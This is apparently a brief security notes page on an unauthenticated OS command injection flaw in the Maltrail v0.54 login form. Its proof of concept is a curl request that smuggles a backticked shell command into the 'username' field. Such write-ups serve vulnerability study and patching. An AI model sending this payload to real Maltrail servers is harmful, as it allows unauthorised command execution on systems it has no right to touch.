🛤️Maltrail - OS Command Injection

Application Description

Maltrail is a malicious traffic detection system ,read more about it HERE

Vulnerability Description

On February 24th, 2023, a researcher discovered and reported a vulnerability in Maltrail v0.54. This vulnerability exposes the system to unauthenticated OS command injection during the login process.

POC

Maltrail main web page

The vulnerability exists in the 'username' parameter, which is susceptible to blind OS command injection.

curl 'http://hostname:8338/login' \
  --data 'username=;`id > /tmp/test`'

Resources

Unauthenticated OS Command Injection in stamparm/maltrail-...Vulners Database

PreviousCVE-2023-27163 NextCrafty - HTB

Last updated 1 year ago